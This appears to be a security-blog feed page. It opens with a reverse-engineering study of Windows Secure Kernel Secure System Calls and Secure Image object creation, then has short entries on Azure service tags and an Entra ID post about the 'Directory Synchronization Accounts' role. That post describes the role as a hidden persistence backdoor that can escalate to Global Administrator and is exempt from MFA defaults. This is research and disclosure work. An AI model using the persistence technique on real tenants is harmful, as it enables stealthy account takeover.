A “traditional” system call will result in the emission of a syscall assembly instruction, which performs work in order to change the current execution context from user-mode to kernel-mode. Once in kernel-mode, the original request reaches a specified dispatch function which is responsible for servicing the request outlined by the System Call Number. Similarly, a Secure System Call works almost the same in concept (but not necessarily in the technical implementation). Instead of syscall, however, a vmcall instruction is emitted. vmcall is not specific to the Secure Kernel and is a general opcode in the 64-bit instruction set. A vmcall instruction simply allows guest software (in our case, as we know from HVCI, VTL 0 - which is where NT lives - is effectively treated as “the guest”) to make a call into the underlying VM monitor/supervisor (Hyper-V). In other words, this results in a call into Secure Kernel from NT.

The NT function nt!VslpEnterIumSecureMode is a wrapper for emitting a vmcall. The thought process can be summed up, therefore, as this: if a given function invokes the nt!VslpEnterIumSecureMode function in NT, that caller of said function is responsible (generally speaking mind you) of invoking a Secure System Call.

Although performing dynamic analysis on the Secure Kernel is difficult, one thing to note here is that the order the Secure Systm Call arguments are packed and shipped to the Secure Kernel is the same order the Secure Kernel will operate on them. So, as an example, the function nt!VslCreateSecureImageSection is one of the many functions in NT that results in a call to nt!VslpEnterIumSecureMode.

The Secure System Call Number, or SSCN, is stored in the RDX register. The R9 register, although not obvious from the screenshot above, is responsible for storing the packed Secure System Call arguments. These arguments are packed in the form of a in-memory typedef struct structure (which we will look at later).

On the Secure Kernel side, the function securekernel!IumInvokeSecureService is a very large function which is the “entry point” for Secure System Calls. This contains a large switch/case statement that correlates a given SSCN to a specific dispatch function handler. The exact same order these arguments are packed is the exact same order they will be unpacked and operated on by the Secure Kernel (in the screenshot below, a1 is the address of the structure, and we can see how various offsets are being extracted from the structure, which is due to struct->Member access).

Now that we have a bit of an understanding here, let’s move on to see how the Secure System Call mechanism is used to help Secure Kernel create a Secure Image object!

`SECURE_IMAGE` (Non-Comprehensive!) Creation Overview

Although by no means is this a surefire way to identify this data, a method that could be employed to locate the functionality for creating Secure Image objects is to just search for terms like SecureImage in the Secure Kernel symbols. Within the call to securekernel!SkmmCreateSecureImageSection we see a call to an externally-imported function, skci!SkciCreateSecureImage.

This means it is highly likely that securekernel!SkmmCreateSecureImageSection is responsible for accepting some parameters surrounding the Secure Image object creation and forwarding that on to skci!SkciCreateSecureImage. Focusing our attention on securekernel!SkmmCreateSecureImageSection we can see that this functionality (securekernel!SkmmCreateSecureImageSection) is triggered through a Secure System Call with an SSCN of 0x19 (the screenshot below is from the securekernel!IumInvokeSecureService Secure System Call dispatch function).

Again, by no means is this correct in all cases, but I have noticed that most of the time when a Secure System Call is issued from ntoskrnl.exe, the corresponding “lowest-level function”, which is responsible for invoking nt!VslpEnterIumSecureMode, has a similar name to the associated sispatch function in securekernel.exe which handles the Secure System Call. Luckily this applies here and the function which issues the SSCN of 0x19 is the nt!VslCreateSecureImageSection function.

Based on the call stack here, we can see that when a new section object is created for a target driver image being loaded, the ci.dll module is dispatched in order to determine if the image is compatible with HVCI (if it isn’t, STATUS_INVALID_IMAGE_HASH is returned). Examining the parameters of the Secure System Call reveals the following.

Note that at several points I will have restarted the machine the analysis was performed on and due to KASLR the addresses will change. I will provide enough context in the post to overcome this obstacle.

With Secure System Calls, the first parameter (seems to be) always 0 and/or reserved. This means the arguments to create a Secure Image object are packed as follows.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID VirtualAddress;
    PVOID PageFrameNumber;
    bool Unknown;
    ULONG Unknown;
    ULONG Unknown1;
} SECURE_IMAGE_CREATE_ARGS;

As a small point of contention, I know that the page frame number is such because I am used to dealing with looking into memory operations that involve both physical and virtual addresses. Anytime I see I am dealing with some sort of lower-level concept, like loading a driver into memory and I see a value that looks like a ULONG paired with a virtual address, I always assume this could be a PFN. I always assume this further in cases especially when the ULONG value is not aligned. A physical memory address is simply (page frame number * 0x1000), plus any potential offset. Since there is not 0 or 00 at the end of the address, this tells me that this is the page frame number. This is not a “sure” method to do this, but I will show how I validated this below.

At first, I was pretty stuck on what this first virtual address was used for. We previously saw the call stack which is responsible for invoking nt!VslCreateSecureImageSection. If you trace execution in IDA, however, you will quickly see this call stack is a bit convoluted as most of the functions called are called via function pointer as an input parameter from other functions making tracing the arguments a bit difficult. Fortunately, I saw that this virtual address was used in a call to securekernel!SkmmMapDataTransfer almost immediately within the Secure System Call handler function (securekernel!SkmmCreateSecureImageSection). Note although IDA is annotated a bit with additional information, we will get to that shortly.

It seems this function is actually publicly-documented thanks to Saar Amar and Daniel King’s BlackHat talk! This actually reveals to us that the first argument is an MDL (Memory Descriptor List) while the second parameter, which is PageFrameNumber, is a page frame number which we don’t know its use yet.

According to the talk, securekernel.exe tends to use MDLs, which are provided by VTL 0, for cases where data may need to be accessed by VTL 1. By no means is this an MDL internals post, but I will give a brief overview quickly. An MDL (nt!_MDL) is effectively a fixed-sized header which is prepended to a variable-length array of page frame numbers (PFNs). Virtual memory, as we know, is contiguous. The normal size of a page on Windows is 4096, or 0x1000 bytes. Using a contrived example (not taking into account any optimizations/etc.), let’s say a piece of malware allocated 0x2000 bytes of memory and stored shellcode in that same allocation. We could expect the layout of memory to look as follows.

We can see in this example the shellcode spans the virtual pages 0x1ad2000 and 0x1ad3000. However, this is the virtual location, which is contiguous. In the next example, the reality of the situation creeps in as the physical pages which back the shellcode are in two separate locations.

An MDL would be used in this case to describe the physical layout of the memory of a virtual memory region. The MDL is used to say “hey I have this contiguous buffer in virtual memory, but here are the physical non-contiguous page(s) which describe this contiguous range of virtual memory”.

MDLs are also typically used for direct memory access (DMA) operations. DMA operations don’t have the luxury of much verification, because they need to access data quickly (think UDP vs TCP). Because of this an MDL is used because it typically first locks the memory range described into memory so that the DMA operation doesn’t ever access invalid memory.

One of the main features of an MDL is that it allows multiple mappings for the given virtual address a given MDL described (the StartVa is the beginning of the virtual address range the MDL describes). For instance, consider an MDL with the following layout: a user-mode buffer is described by an MDL’s StartVa. As we know, user-mode addresses are only valid within the process context of which they reside (and the address space is per-process based on the current page table directory loaded into the CR3 register). Let’s say that a driver, which is in an arbitrary context needs to access the information in the user-mode buffer contained in Mdl->StartVa. If the driver goes to access this, and the process context is processA.exe but the address was only valid in processB.exe, you are accessing invalid memory and you would cause a crash.

An MDL allows you, through the MmGetSystemAddressForMdlSafe API, to actually request that the system map this memory into the system address space, from the non-paged pool. This allows us to access the contents of the user-mode buffer, through a kernel-mode address, in an arbitrary process context.

Now, using that knowledge, we can see that the exact same reason VTL 0 and VTL 1 use MDLs! We can think of VTL 0 as the “user-mode” portion, and VTL 1 as the “kernel-mode” portion, where VTL 0 has an address with data that VTL 1 wants. VTL 1 can take that data (in the form of an MDL) and map it into VTL 1 so it can safely access the contents of memory described by the MDL.

Taking a look back at how the MDL looks, we can see that StartVa, which is the buffer the MDL describes, is some sort of base address. We can confirm this is actually the base address of an image being loaded because it contains nt!_IMAGE_DOS_HEADER header (0x5a4d is the magic (MZ) for a PE file and can be found in the beginning of the image, which is what a kernel image is).

However, although this looks to be the “base image”, based on the alignment of Mdl->StartVa, we can see quickly that ByteCount tells us only the first 0x1000 bytes of this memory allocation are accessible via this MDL. The ByteCount of an MDL denotes the size of the range being described by the MDL. Usually the first 0x1000 bytes of an image are reserved for all of the headers (IMAGE_DOS_HEADER, IMAGE_FILE_HEADER, etc.). If we recall the original call stack (provided below for completeness) we can actually see that the NT function nt!SeValidateImageHeader is responsible for redirecting execution to ci.dll (which eventually results in the Secure System Call). This means in reality, although the StartVa is aligned to look like a base address, we are really just dealing with the headers of the target image at this point. Even though the StartVa is aligned like a base address, the fact of the matter is the actual address is not relevant to us - only the headers are.

As a point of contention before we move on, we can do basic retroactive analysis based on the call stack to clearly see that the image has only been mapped into memory. It has not been fully loaded - and only the initial section object that backs the image is present in virtual memory. As we do more analysis in this post, we will also verify this to be the case with actual data that shows many of the default values in the headers, from disk, haven’t been fixed up (which normally happens when the image is fully loaded).

Great! Now that we know this first paramter is an MDL that contains the image headers, the next thing that needs to happen is for securekernel.exe to figure out how to safely access the contents region described by the MDL (which are the headers).

The first thing that VTL 1 will do is take the MDL we just showed, provided by VTL 0, and creates a new MDL in VTL 1 that describes the provided MDL from VTL 0. In other words, the new MDL will be laid out as follows.

Vtl1CopyOfVtl0Mdl->StartVa = page_aligned_address_mdl_starts_in;
Vtl1CopyOfVtl0Mdl->ByteOffset = offset_from_page_aligned_address_to_actual_address;

MDLs usually work with a page-aligned address as the base, and any offset in ByteOffset. This is why the VTL 0 MDL is address is first page-aligned (Vtl0Mdl & 0xFFFFFFFFFFFFF000), and the offset to the MDL in the page is set in ByteOffset.

Additionally, from the previous image, we can now realize what the first page frame number used in our Secure System Call parameters is used for. This is the PFN which corresponds to the MDL (the parameter PfnOfVtl0Mdl). We can validate this in WinDbg.

We know that a physical page of memory is simply (page frame number * PAGE_SIZE + any offset). Although we can see in the previous screenshot that the contents of memory for the page-aligned address of the MDL and the physical memory correspond, if we add the page offset (0x250 in this case) we can clearly see that there is no doubt this is the PFN for the VTL 0 MDL. We can additionally see that for the PTE of the VTL0 MDL the PFNs align!

This MDL, after construction, has StartVa mapped into VTL 1. At this point, for all intents and purposes, vtl1MdlThatDescribesVtl0Mdl->MappedSystemVa contains the VTL 1 mapping of the VTL 0 MDL! All integrity checks are then performed on the MDL.

VTL 1 has now mapped the VTL 0 MDL (using another MDL). MappedSystemVa is now a pointer to the VTL 1 mapping of the VTL 0 MDL, and the integrity checks now occur on this new mapping, instead of directly operating on the VTL 0 MDL. After confirming the VTL 0 MDL contains legitimate data (the large if statement in the screenshot below), another MDL (not the MDL from VTL 0, not the MDL created by VTL 1 to describe the MDL from VTL 0, but a third, new MDL) is created. This MDL will be an actual copy of the now verified contents of the VTL 0 MDL. In otherwords, thirdNewMDl->StartVa = StartAddressOfHeaders (which is start of the image we are dealing with in the first place to create a securekernel!_SECURE_IMAGE structure).

We can now clearly see that since VTL 1 has created this new MDL, the page frame number (PFN) of the VTL 0 MDL was provided since a mapping of virtual memory is simply just creating another virtual page which is backed by a common physical page. When the new MDL is mapped, the Secure Kernel can then use NewMdl->MappedSystemVa to safely access, in the Secure Kernel virtual address space, the header information provided by the MDL from VTL 0.

The VTL 1 MDL, which is mapped into VTL 1 and has now had all contents verified. We now return back to the original caller where we started in the first place - securekernel!SkmmCreateSecureImageSection. This then allows VTL 1 to have a memory buffer where the contents of the image from VTL 0 resides. We can clearly see below this is immediately used in a call to RtlImageNtHeaderEx in order to validate that the memory which VTL 0 sent in the first place contains a legitimate image in order to create a securekernel!_SECURE_IMAGE object. It is also at this point that we determine if we are dealing with the 32-bit or 64-bit architecture.

More information is then gathered, such as the size of the optional headers, the section alignment, etc. Once this information is flushed out, a call to an external function SkciCreateSecureImage is made. Based on the naming convention, we can infer this function resides in skci.dll.

We know in the original Secure System Call that the second parameter is the PFN which backs the VTL 0 MDL. UnknownUlong and UnknownUlong1 here are the 4th and 5th parameters, respectively, passed to securekernel!SkmmCreateSecureImageSection. As of right now we also don’t know what they are. The last value I noticed was consistently this 0x800c constant across multiple calls to securekernel!SkmmCreateSecureImageSection.

Opening skci.dll in IDA, we can examine this function further, which seemingly is responsible for creating the secure image.

Taking a look into this function a bit more, we can see this function doesn’t create the object itself but it creates a “Secure Image Context”, which on this build of Windows is 0x110 bytes in size. The first function called in skci!SkciCreateSecureImage is skci!HashKGetHashLength. This is a very simple function, and it accepts two parameters - one an input and one an output or return. The input parameter is our last Secure System Call parameter, which was 0x800C.

Although IDA’s decompilation here is a bit confusing, what this function does is look for a few constant values - one of the options is 0x800C. If the value 0x800C is provided, the output parameter (which is the hash size based on function name and the fact the actual return value is of type NTSTATUS) is set to 0x20. This effectively insinuates that since obviously 0x800C is not a 0x20 byte value, nor a hash, that 0x800C must instead refer to a type of hash which is likely associated with an image. We can then essentially say that the last Secure System Call parameter for secure image creation is the “type” of hash associated with this image. In fact, looking at cross references to this function reveals that the function skci!CiInitializeCatalogs passes the parameter skci!g_CiMinimumHashAlgorithm as the first parameter to this function - meaning that the first parameter actually specifies the hash algorithm.

After calculating the hash size, the Secure Image Context is then built out. This starts by obtaining the Image Headers (nt!_IMAGE_NT_HEADERS64) headers for the image. Then the Secure Image Context is allocated from the pool and initialized to 0 (this is how we know the Secure Image Context is 0x110 bytes in size). The various sections contained in the image are used to build out much of the information tracked by the Secure Image Context.

Note that UnknownULong1 was updated to ImageSize. I wish I had a better way to explain as to how I identified this, but in reality it happenstance as I was examining the optional headers I realized I had seen this value before. See the image below to validate that the value from the Secure System Call arguments corresponds to SizeOfImage.

One thing to keep in mind here is a SECURE_IMAGE object is created before ntoskrnl.exe has had a chance actually perform the full loading of the image. At this point the image is mapped into virtual memory, but not loaded. We can see this by examining the nt!_IMAGE_NT_HEADERS64 structure and seeing that ImageBase in the nt!_IMAGE_OPTIONAL_HEADER64 structure is still set to a generic 0x1c0000000 address instead of the virtual address which the image is currently mapped (because this information has not yet been updated as part of the loading process).

Next in the Secure Image Context creation functionality, the Secure Kernel locates the .rsrc section of the image and the Resource Data Directory. This information is used to calculate the file offset to the Resource Data Directory and also captures the virtual size of the .rsrc section.

After this skci!SkciCreateSecureImage will, if the parameter we previously identified as UnknownBool is set to true, allocate some pool memory which will be used in a call to skci!CiCreateVerificationContextForImageGeneratedPageHashes. This infers to us the “unknown bool” is really an indicator whether or not to create the Verification Context. A context, in this instance, refers to some memory (usually in the form of a structure) which contains information related to the context in which something was created, but wouldn’t be available later otherwise.

The reader should know - I asked Andrea a question about this. The answer here is that a file can either be page-hashed or file-hashed signed. Although the bool gates creating the Verification Context, it is more aptly used to describe if a file is file-hashed or page-hashed. If the image is file-hashed signed, the Verification Context is created. For page-hashed files there is no need for the additional context information (we will see why shortly).

This begs the question - how do we know if we are dealing with a file that was page-hashed signed or file-hash signed? Taking a short detour, this starts in the initial section object creation (nt!MiCreateNewSection). During this time a bitmask, based on the parameters surrounding the creation of the section object that will back the loaded driver is formed. A partially-reversed CREATE_SECTION_PACKET structure from my friend Johnny Shaw outlines this. Packet->Flags is one of the main factors that dictates how this new bitmask is formulated. In the case of the analysis being done in this blog post, when bit 21 (PacketFlags & 0x100000) and when bit 6 (PacketFlags & 0x20) are set, we get the value for our new mask - which has a value of 0x40000001. This bitmask is then carried through to the header validation functions, as seen below.

This bitmask will finally make its way to ci!CiGetActionsForImage. This call, as the name infers, returns another bitmask based on our 0x40000001 bitmask. The caller of ci!CiGetActionsForImage is ci!CiValidateImageHeader. This new returned bitmask gives instructions to the header validation function as to what actions to take for validation.

As previous art shows, depending on the bitmask returned the header validation is going to be done via page hash validation, or file hash validation by supplying a function pointer to the actual validation function.

The two terms (page-hash signed and file-hash signed) can be very confusing - and there is very little information about them in the wild. A file-hashed file is one that has the entire contents of the file itself hashed. However, we must consider things like a driver being paged out and paged in. When an image is paged in, for instance, it needs to be validated. Images in this case are always verified using page hashes, and never file hashes (I want to make clear I only know the following information because I asked Andrea). Because a file-hashed file would not have page hash information available (obviously since it is “file-hashed”), skci.dll will create something called a “Page Hash Context” (which we will see shortly) for file-hashed images so that they are compatible with the requirement to verify information using page hashes.

As a point of contention, this means we have determined the arguments used for a Secure Image Secure System Call.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID Vtl0MdlImageHeaders;
    PVOID PageFrameNumberForMdl;
    bool ImageeIsFileHashedCreateVerificationContext;
    ULONG ImageSize;
    ULONG HashAlgorithm;
} SECURE_IMAGE_CREATE_ARGS;

Moving on, the first thing this function (since we are dealing with a file-hashed image) does is actually call two functions which are responsible for creating additional contexts - the first is an “Image Hash Context” and the second is a “Page Hash Context”. These contexts are stored in the main Verification Context.

skci!CiCreateImageHashContext is a relatively small wrapper that simply takes the hashing algorithm passed in as part of the Secure Image Secure System Call (0x800C in our case) and uses this in a call to skci!SymCryptSha256Init. skci!SymCryptSha256Init takes the hash algorithm (0x800C) and uses it to create the Image Hash Context for our image (which really isn’t so much a “context” as it mainly just contains the size of the hash and the hashing data itself).

The Page Hash Context information is only produced for a file-hashed image. Otherwise file-hashed images would not have a way to be verified in the future as only page hashes are used for verification of the image. Page Hash Context are slightly more involved, but provide much of the same information. skci!CiCreatePageHashContextForImageMapping is responsible for creating this context and VerificationContext_Offset_0x108 stores the actual Page Hash Context.

The Page Hash Context logic begins by using SizeOfRawData from each of the section headers (IMAGE_SECTION_HEADER) to iterate over of the sections available in the image being processed and to capture how many pages make up each section (determines how many pages make up all of the sections of the image).

This information, along with IMAGE_OPTIONAL_HEADER->SizeOfHeaders, the size of the image itself, and the number of pages that span the sections of the image are stored in the Page Hash Context. Additionally, the Page Hash Context is then allocated based on the size of the sections (to ensure enough room is present to store all of the needed information).

After this, the Page Hash Context information is filled out. This begins by only storing the first page of the image in the Page Hash Context. The rest of the pages in each of the sections of the target image are filled out via skci!SkciValidateImageData, which is triggered by a separate Secure System Call. This comes at a later stage after the current Secure System Call has returned but before we have left the original nt!MiCreateNewSection function. We will see this in a future blog post.

Now that the initial Verification Context (which contains also the Page Hash and Image Hash Contexts) have been created (but as we know will be updated with more information later), skci!SkciCreateSecureImage will then sort and copy information from the Image Section Headers and store them in the Verification Context. This function will also calculate the file offset for the last section in the image by computing PointerToRawData + SizeOfRawData in the skci!CiGetFileOffsetAfterLastRawSectionData function.

After this, the Secure Image Context creation work is almost done. The last thing this function does is compute the hash of the first page of the image and stores it in the Secure Image Context directly this time. This also means the Secure Image Context is returned by the caller of skci!SkciCreateSecureImage, which is the Secure Kernel function servicing the original Secure System Call.

Note that previously we saw skci!CiAddPagesToPageHashContext called within skci!CiCreatePageHashContextForImageMapping. In the call in the above image, the fourth parameter is SizeOfHeaders, but in the call within skci!CiCreatePageHashContextForImageMapping the parameter was MdlByteCount - which is the ByteCount provided earlier by the MDL in the Secure System Call arguments. In our case, SizeOfHeaders and the ByteCount are both 0x1000 - which infers that when the MDL is constructured, the ByteCount is set to 0x1000 based on the SizeOfHeaders from the Optional Header. This validates what we mentioned at the beginning of the blog where although the “base address” is used as the first Secure System Call parameter, this could be more specifically referred to as the “headers” for the image.

The Secure Kernel maintains a table of all active Secure Images that are known. There are two very similar tables, which are used to track threads and NARs (securekernel!SkiThreadTable/securekernel!SkiNarTable). These are of type “sparse tables”. A sparse table is a computer science concept that effectively works like a static array of data, but instead of it being unordered the data is ordered which allows for faster lookups. It works by supporting 0x10000000, or 256,000 entries. Note that these entries are not all allocated at once, but are simply “reserved” in the sense that the entries that are not in use are not mapped.

Secure Images are tracked via the securekernel!SkmiImageTable symbol. This table, as a side note, is initialized when the Secure Kernel initializes. The Secure Pool, the Secure Image infrastructure, and the Code Integrity infrastructure are initialized after the kernel-mode user-shared data page is mapped into the Secure Kernel.

The Secure Kernel first allocates an entry in the table where this Secure Image object will be stored. To calculate the index where the object will be stored, securekernel!SkmmAllocateSparseTableEntry is called. This creates a sizeof(ULONG_PTR) “index” structure. This determines the index into the table where the object is stored. In the case of storing a new entry, on 64-bit, the first 4 bytes provide the index and the last 4 bytes are unused (or, if they are used, I couldn’t see where). This is all done back in the original function securekernel!SkmmCreateSecureImageSection, after the function which creates the Secure Image Context has returned.

As we can also see above, this is where our actual Secure Image object is created. As the functionality of securekernel!SkmmCreateSecureImageSection continues, this object will get filled out with more and more information. Some of the first data collected is if the image is already loaded in a valid kernel address. From the blog earlier, we mentioned the Secure Image loading occurs when an image is first mapped but not loaded. This seems to infer it is possible for a Secure Image to be at least already loaded at a valid kernel-mode address. If it is loaded, a bitwise OR happens with a mask of 0x1000 to indicate this. The entry point of the image is captured, and the previously-allocated Secure Image Context data is saved. Also among the first information collected is the Virtual Address and Size of the Load Config Data Directory.

The next items start by determining if the image being loaded is characterized as a DLL (this is technically possible, for example, ci.dll is loaded into kernel-mode) by checking if the 13th bit is set in the FileHeader.Characteristics bitmask.

After this, the Secure Image creation logic will create an allocation based on the size of the image from NtHeaders->OptionalHeader->SizeOfImage. This allocation is not touched again during the initialization logic.

At this point, for each of the sections in the image, the prototype PTEs for the image (via securekernel!SkmiPopulateImagePrototypes) are populated. If you are not familiar, when a shared memory region is shared for, as an example, between two-processes an issue arises at the PTE level. A prototype PTE allows easily for the memory manager to track pages that are shared between two processes. As even Windows Internals, 7th Edition, Part 1, Chapter 5 states - prototype PTEs are created for a pagefile-backed section object when it is first created. The same this effectively is happening here, but instead of actually creating the prototype PTEs (because this is done in VTL 0), the Secure Kernel now obtains a pointer to the prototype PTEs.

After this, additional section data and relocation information for the image is captured. This first starts by checking if the relocation information is stripped and, if the information hasn’t been stripped, the code captures the Image Data Directory associated with relocation information.

The next thing that occurs is, again, each of the present sections is iterated over. This is done to capture some important information about each section in a memory allocation that is stored in the Secure Image object. Specifically here, relocation information is being processed. The Secure Image object creation logic will first allocate some memory in order to store the Virtual Address page number, size of the raw data in number of pages, and pointer to raw data for the section header that is currently being processed. As a part of each check, the logic determines if the relocation table falls within the range of the current section. If it does, the file offset to the relocation table is calculated and stored in the Secure Image object.

Additionally, we saw previously that if the relocation information was stripped out of the image, the Secure Image object (at offset 0x50 and 0x58) were updated with values of false and true, 0 and 1, respectively. This seems to indicate why the relocation information may not be present. In this case, however, if the relocation information wasn’t stripped but there legitimately was no relocation information available (the Image Data Directory entry for the relocation data was zero), these boolean values are updated to true and false, 1 and 0, respectively. This would seem to indicate to the Secure Image object why the relocation information may or may not be present.

The last bits of information the Secure Image object creation logic processes are:

Is the image being processed a 64-bit executable image or are the number of data directories at least 10 decimal in amount to support the data directory we want to capture? If not, skip step 2.
If the above is true, allocate and fill out the “Dynamic Relocation Data”

As a side-note, I only determines the proper name for this data is “Dynamic Relocation Data” because of the routine securekernel!SkmiDeleteImage - which is responsible for deleting a Secure Image object when the object’s reference count reaches 0 (after we get through this last bit of information that is processed, we will talk about this routine in more detail). In the securekernel!SkmiDeleteImage logic, a few pointers in the object itself are checked to see if they are allocated. If they are, they are freed (this makes sense, as we have seen there have been many more memory allocations than just the object itself). SecureImageObject + 0xB8 is checked as a place in the Secure Image object that is allocated. If the allocation is present, a function called securekernel!SkmiFreeDynamicRelocationInfo is called to presumably free this memory.

This would indicate that the “Dynamic Relocation Data” is being created in the Secure Image object creation logic.

The information captured here refers to the load configuration Image Data Directory. The information about the load config data is verified, and the virtual address and size are captured and stored in the Secure Image object. This makes sense, as the dynamic relocation table is just the load config directory of an executable.

This is the last information the Secure Image object needs for the initialization (we know more information will be collected after this Secure System Call returns)! Up until this point, the last parameter we haven’t touched in the securekernel!SkmmCreateSecureImageSection function is the last parameter, which is actually an output parameter. The output parameter here is filled with the results of a call to securekernel!SkobCreateHandle.

If we look back at the initial Secure System Call dispatch function, this output parameter will be stored in the original Secure System Call arguments at offset 0x10 (16 decimal)

This handle is also stored in the Secure Image object itself. This also infers that when a Secure Image object is created, a handle to the object is returned to VTL 0/NT! This handle is eventually stored in the control area for the section object which backs the image (in VTL 0) itself. This is stored in ControlArea->u2.e2.SeImageStub.StrongImageReference.

Note that this isn’t immediately stored in the Control Area of the section object. This happens later, as we will see in a subsequent blog post, but it is something at least to note here. As another point of contention, the way I knew this handle would eventually be stored here is because when I was previously doing analysis on NAR/NTE creation, which we will eventually talk about, this handle value was the first parameter passed as part of the Secure System Call.

This pretty much sums up the instantiation of the initial Secure Image object. The object is now created but not finalized - much more data still needs to be validated. Because this further validation happens after the Secure System Call returns, I will put that analysis into another blog post. The future post we will look at what ntoskrnl.exe, securekernel.exe, and skci.dll do with this object after the initial creation before the image is actually loaded fully into VTL 0. Before we close the blog post, it is worth taking a look the object itself and how it is treated by the Secure Kernel.

Secure Image Objects - Now What?

After the Secure Image object is created, the “clean-up” code for the end of the function (securekernel!SkmmCreateSecureSection) dereferences the object if the object was created but failure occured during the setting up of the initial object. Notice that the object is dereferenced at 0x20 bytes before the actual object address.

What does this mean? Objects are prepended with a header that contains metadata about the object itself. The reference count for an object, historically, on Windows is contained in the object header (for the normal kernel this is nt!_OBJECT_HEADER). This tells us that each object managed by the Secure Kernel has a 0x20 byte header! Taking a look at securekernel!SkobpDereferenceObject we can clearly see that within this header the reference count itself is stored at offset 0x18. We can also see that there is an object destructor, contained in the header itself.

Just like regular NT objects, there is a similar “OBJECT_TYPE” setup (nt!PsProcessType, nt!PsThreadType, etc.). Taking a look at the image below, securekernel!SkmiImageType is used when referring to Secure Image Objects.

Existing art denotes that this object type pointer (securekernel!SkmiImageType) contains the destructor and size of the object. This can be corroborated by the interested reader by opening securekernel.exe as data in WinDbg (windbgx -z C:\Windows\system32\securekernel.exe) and looking at the object type directly. This reveals that for the securekernel!SkmiImageType symbol there is an object destructor and, as we saw earlier with the value 0xc8, the size of this type of object.

The following are a list of most of the valid objects in the Secure Kernel I located (although it is unclear without further analysis what many of them are used for):

Secure Image Objects (securekernel!SkmiImageType)
Secure HAL DMA Enabler Objects (securekernel!SkhalpDmaEnablerType)
Secure HAL DMA Mapping Objects (securekernel!SkhalpDmaMappingType)
Secure Enclave Objects (securekernel!SkmiEnclaveType)
Secure Hal Extension Object (securekernel!SkhalExtensionType)
Secure Allocation Object (securekernel!SkmiSecureAllocationType)
Secure Thread Object (securekernel!SkeThreadType)
Secure Shadow Synchronization Objects (events/semaphores) (securekernel!SkeShadowSyncObjectType)
Secure Section Object (securekernel!SkmiSectionType)
Secure Process Object (securekernel!SkpsProcessType)
Secure Worker Factory Object (securekernel!SkeWorkerFactoryObjectType)
Secure PnP Device Object (securekernel!SkPnpSecureDeviceObjectType)

Additional Resources

Legitimately, at the end of the analysis I did for this blog, I stumbled across these wonderful documents titled “Security Policy Document”. They are produced by Microsoft for FIPS (The Federal Information Processing Standard). They contains some additional insight into SKCI/CI. Additional documents on other Windows technologies can be found here.

Conclusion

I hope the reader found at least this blog to not be so boring, even if it wasn’t informational to you. As always, if you have feedback please don’t hesitate to reach out to me. I would also like to thank Andrea Allievi for answering a few of my questions about this blog post! I did not ask Andrea to review every single aspect of this post (so any errors in this post are completely mine). If, again, there are issues identified please reach out to me so I can make edits!

Peace, love, and positivity!

Improved Guidance for Azure Network Service Tags

Microsoft Security Response Center

3 June 2024 at 07:00

Summary Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose.

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID

Tenable TechBlog - Medium

Clément Notin [Tenable]

3 June 2024 at 13:01

Summary

The “Directory Synchronization Accounts” Entra role is very powerful (allowing privilege escalation to the Global Administrator role) while being hidden in Azure portal and Entra admin center, in addition to being poorly documented, making it a perfect stealthy backdoor for persistence in Entra ID 🙈

This was discovered by Tenable Research while working on identity security.

“Directory Synchronization Accounts” role

Permissions inside Microsoft Entra ID (e.g. reset user password, change group membership, create applications, etc.) are granted through Entra roles. This article focuses on the Directory Synchronization Accounts role among the around 100 built-in Entra roles. This role has the ID “d29b2b05–8046–44ba-8758–1e26182fcf32”, it has the PRIVILEGED label that was recently introduced, and its description is:

This is a privileged role. Do not use. This role is automatically assigned to the Microsoft Entra Connect service, and is not intended or supported for any other use.

A privileged role that one should not use? It sounds like an invitation to me! 😉

The documentation seems to say that this special role cannot be freely assigned:

This special built-in role can’t be granted outside of the Microsoft Entra Connect wizard

This is incorrect since it can be assigned technically, even if it shouldn’t be (pull-request to fix this).

Privileged role

I confirm that the role is privileged because, of course, it contains some permissions marked as privileged, but also because it has implicit permissions in the private undocumented “Azure AD Synchronization” API (not to be confused with the public “Microsoft Entra Synchronization” API).

These permissions allow escalation up to the Global Administrator role using several methods that we will see later💥

Normal usage by Microsoft Entra Connect

The normal usage of this role is indeed to be assigned to the Entra service account used by “Entra Connect” (formerly “Azure AD Connect”), i.e. the user named “On-Premises Directory Synchronization Service Account” which has a UPN with this syntax: “SYNC_<name of the on-prem server where Entra Connect runs>_<random id>@tenant.example.net”.

Even though it is not documented (I’ve proposed a pull-request to fix this), this role is also assigned to the similar Entra service account used by “Entra Cloud Sync” (formerly “Azure AD Connect Cloud Sync”), i.e. the user also named “On-Premises Directory Synchronization Service Account” but which has a UPN with this syntax: “[email protected]” instead.

This role grants to the Entra service user, the permissions it requires to perform its inter-directory provisioning duties, such as creating/updating hybrid Entra users from the on-premises AD users, updating their password in Entra when it changes in AD with Password Hash Sync enabled, etc.

Security defaults

Security defaults is a feature in Entra ID allowing to activate multiple security features at once to increase security, notably requiring Multi-Factor Authentication (MFA). However, as documented by Microsoft and highlighted by Dr. Nestori Syynimaa @DrAzureAD, the “Directory Synchronization Accounts” role assignees are excluded from security defaults!

Dr. Nestori Syynimaa on Twitter: "Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE / Twitter"

Pro tip for threat actors:Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷Pro tip for admins:Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE

Nestori also confirmed that the limitation concerns all those assigned to the role (I’ve proposed a pull-request to update the doc).

Once again, I understand the need for this since the legitimate accounts are user accounts, thus subject to MFA rules. However, this could be abused by a malicious administrator who wants to avoid MFA 😉

Hidden role

Here is the proof that this role is hidden in the Azure portal / Entra admin center. See this Entra Connect service account apparently having 1 role assigned:

But no results are shown in the “Assigned roles” menu (same in the other tabs, e.g. “Eligible assignments”) 🤔:

Actually I tested it in several of my tenants and I noticed that the role was displayed in another tenant:

I suppose that the portal is running a different version of the code, or due to a feature-flag or A/B testing, because this one uses the MS Graph API (on graph.microsoft.com) to list the role assignments:

